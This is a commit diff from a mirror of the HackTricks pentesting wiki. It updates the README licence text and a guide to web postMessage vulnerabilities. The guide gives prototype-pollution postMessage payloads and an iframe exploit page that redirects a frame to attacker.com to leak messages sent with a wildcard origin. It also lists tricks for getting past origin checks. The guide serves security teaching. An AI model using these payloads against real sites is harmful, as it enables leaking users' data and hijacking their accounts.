0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] 2 pages modified

This commit is contained in:
CPol 2021-10-04 21:42:12 +00:00 committed by gitbook-bot
parent 8625431ec6
commit eb47c749d2
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 37 additions and 36 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
README.md
View File

@ -50,7 +50,6 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
**Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.**
**Copyright © Carlos Polop 2020. Except where otherwise specified \(the copied information belongs to the original authors\), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International \(CC BY-NC 4.0\)**](https://creativecommons.org/licenses/by-nc/4.0/)**.
If you want to use it with commercial purposes, please contact with me.**

68
pentesting-web/postmessage-vulnerabilities.md
View File

@ -1,40 +1,51 @@
# PostMessage Vulnerabilities
## **PostMessages wildcards**
## Send **PostMessage**
**PostMessage** uses the following function to send a message:
```javascript
```bash
targetWindow.postMessage(message, targetOrigin, [transfer]);
# postMessage to current page
window.postMessage('{"__proto__":{"isAdmin":True}}', '*')
# postMessage to an iframe with id "idframe"
document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*')
# postMessage to an URL
window.postMessage('{"__proto__":{"isAdmin":True}}', 'https://company.com')
```
Check that **targetOrigin** could be a url like _https://company.com_, so the messages can only be sent to that user \(secure\). Or it cloud be a wildcard "**\***". In case a wildcard is used, messages could be sent to any domain.
Note that **targetOrigin** can be a '\*' or an URL like _https://company.com._
In the **second scenario**, the **message can only be sent to that domain** \(even if the origin of the window object is different\).
If the **wildcard** is used, **messages could be sent to any domain**, and will be sent to the origin of the Window object.
### Attack
### Attacking iframe & wilcard in **targetOrigin**
In [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) you can read how you could **iframe a page** that at some point may **sent** a **postmessage** using a **wildcard as targetOrigin** and **modify it's location so the data will be sent to an arbitrary domain**. In order to be able to perform this attack **X-Frame header must not be present** in the vuln page.
As explained in [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) if you find a page that can be **iframed** \(no `X-Frame-Header` protection\) and that is **sending sensitive** message via **postMessage** using a **wildcard** \(\*\), you can **modify** the **origin** of the **iframe** and **leak** the **sensitive** message to a domain controlled by you.
Note that if the page can be iframed but the **targetOrigin** is **set to a URL and not to a wildcard**, this **trick won't work**.
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);
function exp(){
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
<iframe src="https://docs.google.com/document/ID" />
<script>
setTimeout(exp, 6000); //Wait 6s
//Try to change the origin of the iframe each 100ms
function exp(){
setInterval(function(){
window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
}, 100);
}
</script>
</html>
```
## addEventListener exploitation
In order to treat the messages a code similar to the following one will be used:
**`addEventListener`** is the function used by JS to declare the function that is **expecting `postMessages`**.
A code similar to the following one will be used:
```javascript
window.addEventListener("message", (event) => {
@ -45,24 +56,15 @@ window.addEventListener("message", (event) => {
}, false);
```
Note in this case how the first thing that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information \(like changing a password\). If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints and change the victims passwords \(in this example\).
Note in this case how the **first thing** that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information \(like changing a password\). **If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints** and change the victims passwords \(in this example\).
It's important to check the origin and it's **equally important to check it right:**
### Tips/Bypasses in PostMessage vulnerabilities
### addEventListener check origin bypasses
Copied from [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)
* If `indexOf()` is used to check the origin of the PostMessage event, remember that it can be bypassed if the origin is contained in the string as seen in [_The Bypass_](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html#bypass)
* [@filedescriptor](https://twitter.com/filedescriptor): Using `search()` to validate the origin could be insecure. According to the docs of `String.prototype.search()`, the method takes a regular repression object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp.
```javascript
"https://www.safedomain.com".search(t.origin)
```
In regular expression, a dot \(.\) is treated as a wildcard. In other words, any character of the origin can be replaced with a dot. An attacker can take advantage of it and use a special domain instead of the official one to bypass the validation, such as **www.s.afedomain.com**.
* [@bored-engineer](https://bored.engineer/): If `escapeHtml` function is used, the function does not create a `new` escaped object, instead it over-writes properties of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
* If **`indexOf()`** is used to **check** the **origin** of the PostMessage event, remember that it can be easily bypassed like in the following example: `("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")`
* If **`search()`** is used to **validate** the **origin** could be insecure. According to the docs of `String.prototype.search()`, the method **takes a regular repression** object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp. In regular expression, **a dot \(.\) is treated as a wildcard**. An attacker can take advantage of it and **use** a **special domain** instead of the official one to bypass the validation, like in: `"https://www.safedomain.com".search("www.s.fedomain.com")`.
* If **`escapeHtml`** function is used, the function does not create a `new` escaped object, instead it over-writes properties of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
```javascript
// Expected to fail: